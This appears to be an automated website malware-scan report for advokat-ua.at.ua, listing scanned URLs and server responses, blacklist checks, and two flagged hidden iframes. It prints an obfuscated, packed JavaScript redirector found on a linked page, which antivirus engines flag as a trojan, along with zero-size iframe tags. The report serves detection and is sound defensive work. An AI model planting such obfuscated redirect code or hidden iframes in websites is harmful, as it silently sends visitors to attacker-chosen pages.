New scan:

Malware Scanner report for advokat-ua.at.ua

Malicious/Suspicious/Total urls checked
1/0/19
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/7
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://advokat-ua.at.ua/dir/0-0-1-7-20
HTTP/1.1 302 Found
Cache-Control: private
Connection: close
Date: Sat, 26 Sep 2015 13:42:07 GMT
Location: http://bux-arhiv.ucoz.com/
Server: uServ/3.2.2
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 2advokat-uauCoz=; path=/; expires=Thu, 26-Sep-2013 13:42:07 GMT; domain=.advokat-ua.at.ua;
Set-Cookie: 2advokat-uadrrd=BwCvoAZW; path=/dir; expires=Sun, 25-Sep-2016 13:42:07 GMT; domain=.advokat-ua.at.ua;
clean
http://bux-arhiv.ucoz.com/
200 OK
Content-Length: 108135
Content-Type: text/html
clean
http://s36.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s36.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s36.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean
http://link.links-wm.ru/?id=5140&t=1
200 OK
Content-Length: 3315
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 0x0     
src: http://web-sar.ru/index.html

<iframe src="http://web-sar.ru/index.html" width="0" height="0" frameborder="0">

http://link.links-wm.ru/test404page.js
404 Not Found
Content-Length: 317
Content-Type: text/html
clean
http://p73608.adskape.ru/adout.js?p=73608&t=8&tx=3&ty=1
200 OK
Content-Length: 399
Content-Type: text/html
clean
http://p73608.adskape.ru/adout.php?p=73608&t=8&tx=3&ty=1&sid=' + sid + ref + topfr +'
200 OK
Content-Length: 2533
Content-Type: text/html
clean
http://p73608.adskape.ru/adclick.php?id=10554&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=92945c05fb9f6474f67458912e42882c&tid2=3384426&psid=0
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 26 Sep 2015 13:42:11 GMT
Location: http://nick.olegarxiya.com/?page_id=2
Server: nginx/1.2.4
Content-Type: text/html
Set-Cookie: click[]=10554; expires=Sat, 26-Sep-2015 21:00:00 GMT
X-Powered-By: PHP/5.4.7
clean
http://nick.olegarxiya.com/?page_id=2
HTTP/1.1 302 Found
Connection: close
Date: Sat, 26 Sep 2015 13:42:10 GMT
Location: http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
clean
http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2
200 OK
Content-Length: 3639
Content-Type: text/html
clean
http://p73608.adskape.ru/adclick.php?id=14081&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=95c78b6e593cb612d7aa29f570c8e890&tid2=3384426&psid=0
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 26 Sep 2015 13:42:12 GMT
Location: http://vasiliy777.qwertybiz.com
Server: nginx/1.2.4
Content-Type: text/html
Set-Cookie: click[]=14081; expires=Sat, 26-Sep-2015 21:00:00 GMT
X-Powered-By: PHP/5.4.7
clean
http://vasiliy777.qwertybiz.com/
200 OK
Content-Length: 10058
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('<p q="t/u">v.x(r(\'%d%5%2%3%8%7%1%g%1%f%7%9%e%a%1%9%i%1%6%j%b%k%b%5%2%3%8%7%1%a%c%s%m%2%w%o%9%F%1%n%h%3%8%1%9%D%0%d%5%2%0%4%0%3%8%7%1%g%1%0%4%0%f%7%9%e%a%1%9%
... 426 bytes are skipped ...
D%79%20%3D%20%2F%71%77%65%72%74%79%62%69%7A%2E%63%6F%6D%2F%3B%20%76%61%72%20%61%72%72%61%79%20%3D%20%5B%22%6C%6F%63%61%74%69%6F%6E%22%2C%20%22%68%6F%73%74%22%5D%3B%20%76%61%72%20%68%6F%73%74%20%3D%20%77%69%6E%64%6F%77%5B%61%72%72%61%79%5B%30%5D%5D%5B%61%72%72%61%79%5B%31%5D%5D%3B%20%6D%79%2E%74%65%73%74%28%68%6F%73%74%29%20%3F%20%28%68%6F%73%74%29%20%3A%20%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%27%68%74%74%70%3A%2F%2F%71%77%65%72%74%79%70%61%79%2E%63%6F%6D%27%3B%3C%2F%73%63%72%69%70%74%3E'));

Antivirus reports:

AntiVir
HTML/Infected.tcr
Comodo
TrojWare.JS.Agent.TC
ESET-NOD32
JS/Redirector.NJF.Gen

Hidden iFrame found.
size: 1x1     
src: http://qwertypay.com/rbk.php?aff=vasiliy777

<iframe name="rt" src="http://qwertypay.com/rbk.php?aff=vasiliy777" width="1" height="1" frameborder="0" scrolling="no">

http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
200 OK
Content-Length: 93637
Content-Type: text/javascript
clean
http://qwertybiz.com/templates_new/s1/2/qwertypay_comslider.js
200 OK
Content-Length: 68921
Content-Type: application/x-javascript
clean
http://qwertypay.com/any/shop_tovar/2/qwertypaycom.js?aff=vasiliy777&line&color=37b39a&blocks=4&width=240
200 OK
Content-Length: 242
Content-Type: text/html
clean
http://qwertypay.com/any/buy_buttons/regbut/jswf/swfobject.js
200 OK
Content-Length: 9759
Content-Type: application/x-javascript
clean
http://cnt.rambler.ru/top100.jcn?1962306
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: advokat-ua.at.ua

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: advokat-ua.at.ua
Referer: http://www.google.com/search?q=advokat-ua.at.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=advokat-ua.at.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://advokat-ua.at.ua/

Result: advokat-ua.at.ua is not infected or malware details are not published yet.